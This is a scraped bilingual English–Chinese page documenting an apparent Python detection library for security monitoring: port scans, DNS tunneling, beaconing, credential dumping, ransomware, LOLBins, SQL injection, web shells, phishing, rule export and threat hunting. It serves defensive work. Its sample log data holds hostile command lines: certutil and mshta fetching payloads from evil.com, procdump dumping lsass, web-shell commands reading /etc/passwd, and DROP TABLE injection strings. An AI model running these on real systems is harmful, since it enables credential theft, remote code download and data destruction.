detection
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseDetection Use Cases Skill
检测用例Skill
Comprehensive detection capabilities for identifying security threats across all attack vectors. Supports rule creation, event analysis, and threat hunting workflows.
具备全面的检测能力,可识别所有攻击向量中的安全威胁。支持规则创建、事件分析和威胁狩猎工作流。
Capabilities
功能特性
- Network Detections: Port scanning, DNS tunneling, beaconing, lateral movement, exfiltration
- Endpoint Detections: Malware, ransomware, process injection, credential dumping, persistence
- Identity Detections: Brute force, credential stuffing, impossible travel, privilege abuse
- Cloud Detections: Resource hijacking, IAM abuse, cryptomining, container escape
- Application Detections: SQL injection, XSS, web shells, API abuse
- Email Detections: Phishing, BEC, malicious attachments
- Detection Rule Management: Create, test, and tune detection rules
- 网络检测:端口扫描、DNS隧道、信标通信、横向移动、数据泄露
- 终端检测:恶意软件、勒索软件、进程注入、凭证窃取、持久化机制
- 身份检测:暴力破解、凭证填充、不可能旅行、权限滥用
- 云检测:资源劫持、IAM滥用、加密货币挖矿、容器逃逸
- 应用检测:SQL注入、XSS、WebShell、API滥用
- 邮件检测:钓鱼邮件、商务邮件欺诈(BEC)、恶意附件
- 检测规则管理:创建、测试和调优检测规则
Quick Start
快速开始
python
from detection_utils import (
NetworkDetector, EndpointDetector, IdentityDetector,
CloudDetector, ApplicationDetector, EmailDetector,
DetectionRule, ThreatHunter
)python
from detection_utils import (
NetworkDetector, EndpointDetector, IdentityDetector,
CloudDetector, ApplicationDetector, EmailDetector,
DetectionRule, ThreatHunter
)Network detection
Network detection
network = NetworkDetector()
result = network.detect_beaconing(conn_logs)
network = NetworkDetector()
result = network.detect_beaconing(conn_logs)
Endpoint detection
Endpoint detection
endpoint = EndpointDetector()
result = endpoint.detect_credential_dumping(process_events)
endpoint = EndpointDetector()
result = endpoint.detect_credential_dumping(process_events)
Create detection rule
Create detection rule
rule = DetectionRule(
name='Suspicious PowerShell Execution',
category='endpoint',
severity='High'
)
rule.add_condition('process_name', 'equals', 'powershell.exe')
rule.add_condition('command_line', 'contains', '-encodedcommand')
print(rule.to_sigma())
undefinedrule = DetectionRule(
name='Suspicious PowerShell Execution',
category='endpoint',
severity='High'
)
rule.add_condition('process_name', 'equals', 'powershell.exe')
rule.add_condition('command_line', 'contains', '-encodedcommand')
print(rule.to_sigma())
undefinedUsage
使用方法
Network Detection: Port Scanning
网络检测:端口扫描
Detect reconnaissance through port scanning activity.
Example:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()检测通过端口扫描进行的侦察活动。
示例:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()Analyze connection logs for scanning
Analyze connection logs for scanning
conn_logs = [
{'src_ip': '192.168.1.100', 'dst_ip': '10.0.0.5', 'dst_port': 22, 'timestamp': '2024-01-15 10:00:01'},
{'src_ip': '192.168.1.100', 'dst_ip': '10.0.0.5', 'dst_port': 23, 'timestamp': '2024-01-15 10:00:01'},
{'src_ip': '192.168.1.100', 'dst_ip': '10.0.0.5', 'dst_port': 80, 'timestamp': '2024-01-15 10:00:02'},
# ... many more ports in short time
]
result = detector.detect_port_scan(conn_logs, threshold=50, time_window=60)
if result['detected']:
print(f"Port scan detected from {result['source_ip']}")
print(f"Ports scanned: {result['port_count']}")
print(f"Scan type: {result['scan_type']}") # horizontal, vertical, or block
undefinedconn_logs = [
{'src_ip': '192.168.1.100', 'dst_ip': '10.0.0.5', 'dst_port': 22, 'timestamp': '2024-01-15 10:00:01'},
{'src_ip': '192.168.1.100', 'dst_ip': '10.0.0.5', 'dst_port': 23, 'timestamp': '2024-01-15 10:00:01'},
{'src_ip': '192.168.1.100', 'dst_ip': '10.0.0.5', 'dst_port': 80, 'timestamp': '2024-01-15 10:00:02'},
# ... many more ports in short time
]
result = detector.detect_port_scan(conn_logs, threshold=50, time_window=60)
if result['detected']:
print(f"Port scan detected from {result['source_ip']}")
print(f"Ports scanned: {result['port_count']}")
print(f"Scan type: {result['scan_type']}") # horizontal, vertical, or block
undefinedNetwork Detection: DNS Tunneling
网络检测:DNS隧道
Detect data exfiltration via DNS.
Example:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()
dns_queries = [
{'query': 'aGVsbG8gd29ybGQ.evil.com', 'query_type': 'TXT', 'timestamp': '2024-01-15 10:00:00'},
{'query': 'dGhpcyBpcyBkYXRh.evil.com', 'query_type': 'TXT', 'timestamp': '2024-01-15 10:00:01'},
]
result = detector.detect_dns_tunneling(dns_queries)
if result['detected']:
print(f"DNS tunneling detected to: {result['tunnel_domain']}")
print(f"Indicators: {result['indicators']}")
# High entropy subdomains, unusual query types, query frequency检测通过DNS进行的数据泄露。
示例:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()
dns_queries = [
{'query': 'aGVsbG8gd29ybGQ.evil.com', 'query_type': 'TXT', 'timestamp': '2024-01-15 10:00:00'},
{'query': 'dGhpcyBpcyBkYXRh.evil.com', 'query_type': 'TXT', 'timestamp': '2024-01-15 10:00:01'},
]
result = detector.detect_dns_tunneling(dns_queries)
if result['detected']:
print(f"DNS tunneling detected to: {result['tunnel_domain']}")
print(f"Indicators: {result['indicators']}")
# High entropy subdomains, unusual query types, query frequencyNetwork Detection: C2 Beaconing
网络检测:C2信标通信
Detect command and control communication patterns.
Example:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()检测命令与控制(C2)通信模式。
示例:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()Network connections over time
Network connections over time
connections = [
{'dst_ip': '198.51.100.1', 'dst_port': 443, 'bytes': 256, 'timestamp': '2024-01-15 10:00:00'},
{'dst_ip': '198.51.100.1', 'dst_port': 443, 'bytes': 260, 'timestamp': '2024-01-15 10:05:00'},
{'dst_ip': '198.51.100.1', 'dst_port': 443, 'bytes': 252, 'timestamp': '2024-01-15 10:10:00'},
# Regular interval pattern...
]
result = detector.detect_beaconing(connections, jitter_threshold=0.2)
if result['detected']:
print(f"Beaconing detected to {result['destination']}")
print(f"Interval: {result['interval_seconds']}s (jitter: {result['jitter']}%)")
print(f"Confidence: {result['confidence']}")
undefinedconnections = [
{'dst_ip': '198.51.100.1', 'dst_port': 443, 'bytes': 256, 'timestamp': '2024-01-15 10:00:00'},
{'dst_ip': '198.51.100.1', 'dst_port': 443, 'bytes': 260, 'timestamp': '2024-01-15 10:05:00'},
{'dst_ip': '198.51.100.1', 'dst_port': 443, 'bytes': 252, 'timestamp': '2024-01-15 10:10:00'},
# Regular interval pattern...
]
result = detector.detect_beaconing(connections, jitter_threshold=0.2)
if result['detected']:
print(f"Beaconing detected to {result['destination']}")
print(f"Interval: {result['interval_seconds']}s (jitter: {result['jitter']}%)")
print(f"Confidence: {result['confidence']}")
undefinedNetwork Detection: Lateral Movement
网络检测:横向移动
Detect internal network traversal.
Example:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()
internal_traffic = [
{'src_ip': '10.0.1.50', 'dst_ip': '10.0.2.100', 'dst_port': 445, 'service': 'SMB'},
{'src_ip': '10.0.1.50', 'dst_ip': '10.0.2.101', 'dst_port': 445, 'service': 'SMB'},
{'src_ip': '10.0.1.50', 'dst_ip': '10.0.2.102', 'dst_port': 3389, 'service': 'RDP'},
]
result = detector.detect_lateral_movement(
internal_traffic,
baseline_connections={'10.0.1.50': ['10.0.2.100']}
)
if result['detected']:
print(f"Lateral movement from {result['source']}")
print(f"New destinations: {result['new_destinations']}")
print(f"Protocols used: {result['protocols']}")检测内部网络遍历行为。
示例:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()
internal_traffic = [
{'src_ip': '10.0.1.50', 'dst_ip': '10.0.2.100', 'dst_port': 445, 'service': 'SMB'},
{'src_ip': '10.0.1.50', 'dst_ip': '10.0.2.101', 'dst_port': 445, 'service': 'SMB'},
{'src_ip': '10.0.1.50', 'dst_ip': '10.0.2.102', 'dst_port': 3389, 'service': 'RDP'},
]
result = detector.detect_lateral_movement(
internal_traffic,
baseline_connections={'10.0.1.50': ['10.0.2.100']}
)
if result['detected']:
print(f"Lateral movement from {result['source']}")
print(f"New destinations: {result['new_destinations']}")
print(f"Protocols used: {result['protocols']}")Network Detection: Data Exfiltration
网络检测:数据泄露
Detect unusual data transfers.
Example:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()
transfers = [
{'src_ip': '10.0.1.50', 'dst_ip': '203.0.113.50', 'bytes_out': 500000000, 'protocol': 'HTTPS'},
]
result = detector.detect_exfiltration(
transfers,
baseline_bytes={'10.0.1.50': 1000000}, # Normal: 1MB/day
threshold_multiplier=100
)
if result['detected']:
print(f"Exfiltration detected: {result['bytes_transferred']} bytes")
print(f"Destination: {result['destination']}")
print(f"Anomaly score: {result['anomaly_score']}")检测异常的数据传输行为。
示例:
python
from detection_utils import NetworkDetector
detector = NetworkDetector()
transfers = [
{'src_ip': '10.0.1.50', 'dst_ip': '203.0.113.50', 'bytes_out': 500000000, 'protocol': 'HTTPS'},
]
result = detector.detect_exfiltration(
transfers,
baseline_bytes={'10.0.1.50': 1000000}, # Normal: 1MB/day
threshold_multiplier=100
)
if result['detected']:
print(f"Exfiltration detected: {result['bytes_transferred']} bytes")
print(f"Destination: {result['destination']}")
print(f"Anomaly score: {result['anomaly_score']}")Endpoint Detection: Malware Behavior
终端检测:恶意软件行为
Detect malware through behavioral analysis.
Example:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
process_events = [
{
'process_name': 'suspicious.exe',
'parent_process': 'explorer.exe',
'command_line': 'suspicious.exe -hidden',
'file_writes': ['/temp/payload.dll'],
'registry_writes': ['HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'],
'network_connections': [{'dst_ip': '198.51.100.1', 'dst_port': 443}]
}
]
result = detector.detect_malware_behavior(process_events)
if result['detected']:
print(f"Malware behavior detected: {result['process']}")
print(f"Indicators: {result['indicators']}")
print(f"MITRE ATT&CK: {result['mitre_techniques']}")通过行为分析检测恶意软件。
示例:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
process_events = [
{
'process_name': 'suspicious.exe',
'parent_process': 'explorer.exe',
'command_line': 'suspicious.exe -hidden',
'file_writes': ['/temp/payload.dll'],
'registry_writes': ['HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'],
'network_connections': [{'dst_ip': '198.51.100.1', 'dst_port': 443}]
}
]
result = detector.detect_malware_behavior(process_events)
if result['detected']:
print(f"Malware behavior detected: {result['process']}")
print(f"Indicators: {result['indicators']}")
print(f"MITRE ATT&CK: {result['mitre_techniques']}")Endpoint Detection: Ransomware
终端检测:勒索软件
Detect ransomware encryption activity.
Example:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
file_events = [
{'operation': 'read', 'path': '/documents/file1.docx', 'timestamp': '2024-01-15 10:00:00'},
{'operation': 'write', 'path': '/documents/file1.docx.encrypted', 'timestamp': '2024-01-15 10:00:01'},
{'operation': 'delete', 'path': '/documents/file1.docx', 'timestamp': '2024-01-15 10:00:01'},
# Mass file operations...
]
result = detector.detect_ransomware(file_events, threshold=100, time_window=60)
if result['detected']:
print(f"Ransomware detected!")
print(f"Files affected: {result['file_count']}")
print(f"Encryption pattern: {result['pattern']}")
print(f"Ransom note: {result['ransom_note_path']}")检测勒索软件加密活动。
示例:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
file_events = [
{'operation': 'read', 'path': '/documents/file1.docx', 'timestamp': '2024-01-15 10:00:00'},
{'operation': 'write', 'path': '/documents/file1.docx.encrypted', 'timestamp': '2024-01-15 10:00:01'},
{'operation': 'delete', 'path': '/documents/file1.docx', 'timestamp': '2024-01-15 10:00:01'},
# Mass file operations...
]
result = detector.detect_ransomware(file_events, threshold=100, time_window=60)
if result['detected']:
print(f"Ransomware detected!")
print(f"Files affected: {result['file_count']}")
print(f"Encryption pattern: {result['pattern']}")
print(f"Ransom note: {result['ransom_note_path']}")Endpoint Detection: Credential Dumping
终端检测:凭证窃取
Detect credential theft attempts.
Example:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
process_events = [
{
'process_name': 'procdump.exe',
'command_line': 'procdump.exe -ma lsass.exe',
'target_process': 'lsass.exe',
'access_rights': 'PROCESS_ALL_ACCESS'
}
]
result = detector.detect_credential_dumping(process_events)
if result['detected']:
print(f"Credential dumping detected!")
print(f"Technique: {result['technique']}") # LSASS dump, SAM access, etc.
print(f"Tool indicators: {result['tool_indicators']}")检测凭证窃取尝试。
示例:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
process_events = [
{
'process_name': 'procdump.exe',
'command_line': 'procdump.exe -ma lsass.exe',
'target_process': 'lsass.exe',
'access_rights': 'PROCESS_ALL_ACCESS'
}
]
result = detector.detect_credential_dumping(process_events)
if result['detected']:
print(f"Credential dumping detected!")
print(f"Technique: {result['technique']}") # LSASS dump, SAM access, etc.
print(f"Tool indicators: {result['tool_indicators']}")Endpoint Detection: Persistence Mechanisms
终端检测:持久化机制
Detect attacker persistence.
Example:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
system_changes = [
{'type': 'registry', 'path': 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run', 'value': 'malware.exe'},
{'type': 'scheduled_task', 'name': 'SystemUpdate', 'action': 'C:\\Windows\\Temp\\payload.exe'},
{'type': 'service', 'name': 'WindowsUpdateSvc', 'binary': 'C:\\Windows\\Temp\\svc.exe'},
]
result = detector.detect_persistence(system_changes)
if result['detected']:
print(f"Persistence mechanisms detected: {len(result['mechanisms'])}")
for mech in result['mechanisms']:
print(f" - {mech['type']}: {mech['details']}")检测攻击者的持久化手段。
示例:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
system_changes = [
{'type': 'registry', 'path': 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run', 'value': 'malware.exe'},
{'type': 'scheduled_task', 'name': 'SystemUpdate', 'action': 'C:\\Windows\\Temp\\payload.exe'},
{'type': 'service', 'name': 'WindowsUpdateSvc', 'binary': 'C:\\Windows\\Temp\\svc.exe'},
]
result = detector.detect_persistence(system_changes)
if result['detected']:
print(f"Persistence mechanisms detected: {len(result['mechanisms'])}")
for mech in result['mechanisms']:
print(f" - {mech['type']}: {mech['details']}")Endpoint Detection: Living-off-the-Land Binaries
终端检测:原生系统工具滥用(LOLBins)
Detect LOLBin abuse.
Example:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
process_events = [
{
'process_name': 'certutil.exe',
'command_line': 'certutil.exe -urlcache -split -f http://evil.com/payload.exe',
'parent_process': 'cmd.exe'
},
{
'process_name': 'mshta.exe',
'command_line': 'mshta.exe http://evil.com/script.hta',
'parent_process': 'excel.exe'
}
]
result = detector.detect_lolbin_abuse(process_events)
if result['detected']:
for detection in result['detections']:
print(f"LOLBin abuse: {detection['binary']}")
print(f"Suspicious args: {detection['suspicious_args']}")
print(f"MITRE technique: {detection['mitre_technique']}")检测对原生系统工具(LOLBins)的滥用行为。
示例:
python
from detection_utils import EndpointDetector
detector = EndpointDetector()
process_events = [
{
'process_name': 'certutil.exe',
'command_line': 'certutil.exe -urlcache -split -f http://evil.com/payload.exe',
'parent_process': 'cmd.exe'
},
{
'process_name': 'mshta.exe',
'command_line': 'mshta.exe http://evil.com/script.hta',
'parent_process': 'excel.exe'
}
]
result = detector.detect_lolbin_abuse(process_events)
if result['detected']:
for detection in result['detections']:
print(f"LOLBin abuse: {detection['binary']}")
print(f"Suspicious args: {detection['suspicious_args']}")
print(f"MITRE technique: {detection['mitre_technique']}")Identity Detection: Brute Force
身份检测:暴力破解
Detect password guessing attacks.
Example:
python
from detection_utils import IdentityDetector
detector = IdentityDetector()
auth_logs = [
{'user': 'admin', 'result': 'failure', 'source_ip': '192.168.1.100', 'timestamp': '2024-01-15 10:00:00'},
{'user': 'admin', 'result': 'failure', 'source_ip': '192.168.1.100', 'timestamp': '2024-01-15 10:00:01'},
# Many failures followed by success...
{'user': 'admin', 'result': 'success', 'source_ip': '192.168.1.100', 'timestamp': '2024-01-15 10:05:00'},
]
result = detector.detect_brute_force(auth_logs, failure_threshold=10, time_window=300)
if result['detected']:
print(f"Brute force attack on {result['target_user']}")
print(f"Failures: {result['failure_count']}")
print(f"Source: {result['source_ip']}")
print(f"Attack successful: {result['compromised']}")检测密码猜测攻击。
示例:
python
from detection_utils import IdentityDetector
detector = IdentityDetector()
auth_logs = [
{'user': 'admin', 'result': 'failure', 'source_ip': '192.168.1.100', 'timestamp': '2024-01-15 10:00:00'},
{'user': 'admin', 'result': 'failure', 'source_ip': '192.168.1.100', 'timestamp': '2024-01-15 10:00:01'},
# Many failures followed by success...
{'user': 'admin', 'result': 'success', 'source_ip': '192.168.1.100', 'timestamp': '2024-01-15 10:05:00'},
]
result = detector.detect_brute_force(auth_logs, failure_threshold=10, time_window=300)
if result['detected']:
print(f"Brute force attack on {result['target_user']}")
print(f"Failures: {result['failure_count']}")
print(f"Source: {result['source_ip']}")
print(f"Attack successful: {result['compromised']}")Identity Detection: Impossible Travel
身份检测:不可能旅行
Detect geographic anomalies in logins.
Example:
python
from detection_utils import IdentityDetector
detector = IdentityDetector()
login_events = [
{'user': 'jdoe', 'location': 'New York, US', 'timestamp': '2024-01-15 10:00:00', 'ip': '198.51.100.1'},
{'user': 'jdoe', 'location': 'Tokyo, JP', 'timestamp': '2024-01-15 10:30:00', 'ip': '203.0.113.50'},
]
result = detector.detect_impossible_travel(login_events, max_speed_kmh=1000)
if result['detected']:
print(f"Impossible travel for {result['user']}")
print(f"Distance: {result['distance_km']} km in {result['time_minutes']} minutes")
print(f"Required speed: {result['required_speed_kmh']} km/h")检测登录行为中的地理位置异常。
示例:
python
from detection_utils import IdentityDetector
detector = IdentityDetector()
login_events = [
{'user': 'jdoe', 'location': 'New York, US', 'timestamp': '2024-01-15 10:00:00', 'ip': '198.51.100.1'},
{'user': 'jdoe', 'location': 'Tokyo, JP', 'timestamp': '2024-01-15 10:30:00', 'ip': '203.0.113.50'},
]
result = detector.detect_impossible_travel(login_events, max_speed_kmh=1000)
if result['detected']:
print(f"Impossible travel for {result['user']}")
print(f"Distance: {result['distance_km']} km in {result['time_minutes']} minutes")
print(f"Required speed: {result['required_speed_kmh']} km/h")Identity Detection: Kerberoasting
身份检测:Kerberoasting攻击
Detect Kerberos service ticket attacks.
Example:
python
from detection_utils import IdentityDetector
detector = IdentityDetector()
kerberos_events = [
{'user': 'attacker', 'event_type': 'TGS_REQ', 'service': 'MSSQLSvc/db01', 'encryption': 'RC4'},
{'user': 'attacker', 'event_type': 'TGS_REQ', 'service': 'HTTP/web01', 'encryption': 'RC4'},
{'user': 'attacker', 'event_type': 'TGS_REQ', 'service': 'LDAP/dc01', 'encryption': 'RC4'},
]
result = detector.detect_kerberoasting(kerberos_events, request_threshold=5, time_window=60)
if result['detected']:
print(f"Kerberoasting detected by {result['user']}")
print(f"Service tickets requested: {result['ticket_count']}")
print(f"Targeted services: {result['services']}")检测Kerberos服务票据攻击。
示例:
python
from detection_utils import IdentityDetector
detector = IdentityDetector()
kerberos_events = [
{'user': 'attacker', 'event_type': 'TGS_REQ', 'service': 'MSSQLSvc/db01', 'encryption': 'RC4'},
{'user': 'attacker', 'event_type': 'TGS_REQ', 'service': 'HTTP/web01', 'encryption': 'RC4'},
{'user': 'attacker', 'event_type': 'TGS_REQ', 'service': 'LDAP/dc01', 'encryption': 'RC4'},
]
result = detector.detect_kerberoasting(kerberos_events, request_threshold=5, time_window=60)
if result['detected']:
print(f"Kerberoasting detected by {result['user']}")
print(f"Service tickets requested: {result['ticket_count']}")
print(f"Targeted services: {result['services']}")Cloud Detection: IAM Abuse
云检测:IAM滥用
Detect suspicious IAM activity.
Example:
python
from detection_utils import CloudDetector
detector = CloudDetector()
cloudtrail_events = [
{'event': 'CreateUser', 'user': 'compromised-user', 'target': 'backdoor-admin'},
{'event': 'AttachUserPolicy', 'user': 'compromised-user', 'policy': 'AdministratorAccess'},
{'event': 'CreateAccessKey', 'user': 'compromised-user', 'target': 'backdoor-admin'},
]
result = detector.detect_iam_abuse(cloudtrail_events)
if result['detected']:
print(f"IAM abuse detected by {result['actor']}")
print(f"Suspicious actions: {result['actions']}")
print(f"Risk level: {result['risk_level']}")检测可疑的IAM(身份与访问管理)活动。
示例:
python
from detection_utils import CloudDetector
detector = CloudDetector()
cloudtrail_events = [
{'event': 'CreateUser', 'user': 'compromised-user', 'target': 'backdoor-admin'},
{'event': 'AttachUserPolicy', 'user': 'compromised-user', 'policy': 'AdministratorAccess'},
{'event': 'CreateAccessKey', 'user': 'compromised-user', 'target': 'backdoor-admin'},
]
result = detector.detect_iam_abuse(cloudtrail_events)
if result['detected']:
print(f"IAM abuse detected by {result['actor']}")
print(f"Suspicious actions: {result['actions']}")
print(f"Risk level: {result['risk_level']}")Cloud Detection: Cryptomining
云检测:加密货币挖矿
Detect cloud resource abuse for mining.
Example:
python
from detection_utils import CloudDetector
detector = CloudDetector()
resource_events = [
{'event': 'RunInstances', 'instance_type': 'p3.16xlarge', 'count': 10, 'region': 'us-east-1'},
{'event': 'RunInstances', 'instance_type': 'p3.16xlarge', 'count': 10, 'region': 'us-west-2'},
]
result = detector.detect_cryptomining(resource_events)
if result['detected']:
print(f"Cryptomining detected!")
print(f"GPU instances: {result['gpu_instance_count']}")
print(f"Estimated cost/hour: ${result['estimated_hourly_cost']}")
print(f"Regions: {result['regions']}")检测云资源被滥用进行挖矿的行为。
示例:
python
from detection_utils import CloudDetector
detector = CloudDetector()
resource_events = [
{'event': 'RunInstances', 'instance_type': 'p3.16xlarge', 'count': 10, 'region': 'us-east-1'},
{'event': 'RunInstances', 'instance_type': 'p3.16xlarge', 'count': 10, 'region': 'us-west-2'},
]
result = detector.detect_cryptomining(resource_events)
if result['detected']:
print(f"Cryptomining detected!")
print(f"GPU instances: {result['gpu_instance_count']}")
print(f"Estimated cost/hour: ${result['estimated_hourly_cost']}")
print(f"Regions: {result['regions']}")Application Detection: SQL Injection
应用检测:SQL注入
Detect SQL injection attempts.
Example:
python
from detection_utils import ApplicationDetector
detector = ApplicationDetector()
web_requests = [
{'url': '/search', 'params': {'q': "'; DROP TABLE users;--"}, 'method': 'GET'},
{'url': '/login', 'params': {'user': "admin'--", 'pass': 'x'}, 'method': 'POST'},
]
result = detector.detect_sql_injection(web_requests)
if result['detected']:
for attack in result['attacks']:
print(f"SQLi attempt: {attack['payload']}")
print(f"Pattern: {attack['pattern']}")
print(f"Endpoint: {attack['endpoint']}")检测SQL注入尝试。
示例:
python
from detection_utils import ApplicationDetector
detector = ApplicationDetector()
web_requests = [
{'url': '/search', 'params': {'q': "'; DROP TABLE users;--"}, 'method': 'GET'},
{'url': '/login', 'params': {'user': "admin'--", 'pass': 'x'}, 'method': 'POST'},
]
result = detector.detect_sql_injection(web_requests)
if result['detected']:
for attack in result['attacks']:
print(f"SQLi attempt: {attack['payload']}")
print(f"Pattern: {attack['pattern']}")
print(f"Endpoint: {attack['endpoint']}")Application Detection: Web Shells
应用检测:WebShell
Detect web shell uploads and access.
Example:
python
from detection_utils import ApplicationDetector
detector = ApplicationDetector()
web_logs = [
{'url': '/uploads/shell.php', 'params': {'cmd': 'whoami'}, 'response_size': 50},
{'url': '/images/logo.php', 'params': {'c': 'cat /etc/passwd'}, 'response_size': 2000},
]
result = detector.detect_webshell(web_logs)
if result['detected']:
print(f"Web shell detected: {result['path']}")
print(f"Commands executed: {result['commands']}")
print(f"Indicators: {result['indicators']}")检测WebShell的上传和访问行为。
示例:
python
from detection_utils import ApplicationDetector
detector = ApplicationDetector()
web_logs = [
{'url': '/uploads/shell.php', 'params': {'cmd': 'whoami'}, 'response_size': 50},
{'url': '/images/logo.php', 'params': {'c': 'cat /etc/passwd'}, 'response_size': 2000},
]
result = detector.detect_webshell(web_logs)
if result['detected']:
print(f"Web shell detected: {result['path']}")
print(f"Commands executed: {result['commands']}")
print(f"Indicators: {result['indicators']}")Email Detection: Phishing
邮件检测:钓鱼邮件
Detect phishing emails.
Example:
python
from detection_utils import EmailDetector
detector = EmailDetector()
emails = [
{
'from': 'security@micros0ft.com',
'subject': 'Urgent: Password Reset Required',
'body': 'Click here to reset your password: http://evil.com/reset',
'links': ['http://evil.com/reset'],
'attachments': []
}
]
result = detector.detect_phishing(emails)
if result['detected']:
print(f"Phishing email detected!")
print(f"Sender impersonation: {result['impersonation']}")
print(f"Suspicious links: {result['suspicious_links']}")
print(f"Urgency indicators: {result['urgency_score']}")检测钓鱼邮件。
示例:
python
from detection_utils import EmailDetector
detector = EmailDetector()
emails = [
{
'from': 'security@micros0ft.com',
'subject': 'Urgent: Password Reset Required',
'body': 'Click here to reset your password: http://evil.com/reset',
'links': ['http://evil.com/reset'],
'attachments': []
}
]
result = detector.detect_phishing(emails)
if result['detected']:
print(f"Phishing email detected!")
print(f"Sender impersonation: {result['impersonation']}")
print(f"Suspicious links: {result['suspicious_links']}")
print(f"Urgency indicators: {result['urgency_score']}")Detection Rule Management
检测规则管理
Create and manage detection rules.
Example:
python
from detection_utils import DetectionRule, DetectionRuleSet创建和管理检测规则。
示例:
python
from detection_utils import DetectionRule, DetectionRuleSetCreate a detection rule
Create a detection rule
rule = DetectionRule(
name='Mimikatz Execution',
category='endpoint',
severity='Critical',
description='Detects Mimikatz credential dumping tool'
)
rule = DetectionRule(
name='Mimikatz Execution',
category='endpoint',
severity='Critical',
description='Detects Mimikatz credential dumping tool'
)
Add conditions
Add conditions
rule.add_condition('process_name', 'equals', 'mimikatz.exe')
rule.add_condition('command_line', 'contains', 'sekurlsa')
rule.add_condition('process_name', 'equals', 'mimikatz.exe')
rule.add_condition('command_line', 'contains', 'sekurlsa')
Add MITRE mapping
Add MITRE mapping
rule.add_mitre_mapping('T1003.001', 'Credential Dumping: LSASS Memory')
rule.add_mitre_mapping('T1003.001', 'Credential Dumping: LSASS Memory')
Export formats
Export formats
print(rule.to_sigma()) # SIGMA format
print(rule.to_kql()) # Kusto Query Language
print(rule.to_splunk()) # Splunk SPL
print(rule.to_sigma()) # SIGMA format
print(rule.to_kql()) # Kusto Query Language
print(rule.to_splunk()) # Splunk SPL
Rule set management
Rule set management
ruleset = DetectionRuleSet('Credential Theft Detections')
ruleset.add_rule(rule)
ruleset.export_all('/rules')
undefinedruleset = DetectionRuleSet('Credential Theft Detections')
ruleset.add_rule(rule)
ruleset.export_all('/rules')
undefinedThreat Hunting
威胁狩猎
Proactive threat hunting workflows.
Example:
python
from detection_utils import ThreatHunter, HuntHypothesis主动威胁狩猎工作流。
示例:
python
from detection_utils import ThreatHunter, HuntHypothesisCreate a hunt
Create a hunt
hunter = ThreatHunter('HUNT-2024-001', 'Detecting Cobalt Strike')
hunter = ThreatHunter('HUNT-2024-001', 'Detecting Cobalt Strike')
Define hypothesis
Define hypothesis
hypothesis = HuntHypothesis(
name='Cobalt Strike Beacon Detection',
description='Hunt for Cobalt Strike beacons using network and endpoint data',
mitre_techniques=['T1071.001', 'T1059.001']
)
hypothesis = HuntHypothesis(
name='Cobalt Strike Beacon Detection',
description='Hunt for Cobalt Strike beacons using network and endpoint data',
mitre_techniques=['T1071.001', 'T1059.001']
)
Add data sources
Add data sources
hypothesis.add_data_source('network_logs', 'Proxy and firewall logs')
hypothesis.add_data_source('process_events', 'EDR process telemetry')
hypothesis.add_data_source('network_logs', 'Proxy and firewall logs')
hypothesis.add_data_source('process_events', 'EDR process telemetry')
Add hunt queries
Add hunt queries
hypothesis.add_query(
'network',
'connections with regular intervals to unknown destinations',
'dst_ip NOT IN known_good AND interval_stddev < 10'
)
hunter.add_hypothesis(hypothesis)
hypothesis.add_query(
'network',
'connections with regular intervals to unknown destinations',
'dst_ip NOT IN known_good AND interval_stddev < 10'
)
hunter.add_hypothesis(hypothesis)
Document findings
Document findings
hunter.add_finding(
hypothesis='Cobalt Strike Beacon Detection',
description='Found beaconing to 198.51.100.1 every 60 seconds',
evidence=['network_log_123', 'process_event_456'],
severity='Critical'
)
hunter.add_finding(
hypothesis='Cobalt Strike Beacon Detection',
description='Found beaconing to 198.51.100.1 every 60 seconds',
evidence=['network_log_123', 'process_event_456'],
severity='Critical'
)
Generate report
Generate report
print(hunter.generate_report())
undefinedprint(hunter.generate_report())
undefinedConfiguration
配置
Detection Thresholds
检测阈值
| Detection | Parameter | Default | Description |
|---|---|---|---|
| Port Scan | | 50 | Ports per time window |
| Port Scan | | 60 | Seconds |
| Beaconing | | 0.2 | Max acceptable jitter |
| Brute Force | | 10 | Failed attempts |
| Ransomware | | 100 | Files modified |
| 检测类型 | 参数 | 默认值 | 描述 |
|---|---|---|---|
| 端口扫描 | | 50 | 时间窗口内扫描的端口数量 |
| 端口扫描 | | 60 | 时间窗口(秒) |
| 信标通信 | | 0.2 | 最大可接受的抖动值 |
| 暴力破解 | | 10 | 失败尝试次数 |
| 勒索软件 | | 100 | 被修改的文件数量 |
Environment Variables
环境变量
| Variable | Description | Required | Default |
|---|---|---|---|
| Logging verbosity | No | |
| Path to baseline data | No | |
| 变量名 | 描述 | 是否必填 | 默认值 |
|---|---|---|---|
| 日志详细程度 | 否 | |
| 基线数据路径 | 否 | |
Limitations
局限性
- No Real-time Processing: Designed for batch analysis, not streaming
- No Built-in Data Collection: Requires pre-collected log data
- Baseline Generation: Baselines must be provided or generated separately
- Geo-IP Data: Requires external geo-IP database for location features
- 无实时处理能力:专为批量分析设计,不支持流式处理
- 无内置数据收集功能:需要预先收集的日志数据
- 基线生成:基线需单独提供或生成
- Geo-IP数据:需要外部Geo-IP数据库支持地理位置功能
Troubleshooting
故障排除
High False Positives
误报率高
Problem: Too many false positive detections
Solution: Adjust thresholds and provide accurate baselines:
python
detector = NetworkDetector()
result = detector.detect_port_scan(logs, threshold=100) # Increase threshold问题:产生过多误报
解决方案:调整阈值并提供准确的基线数据:
python
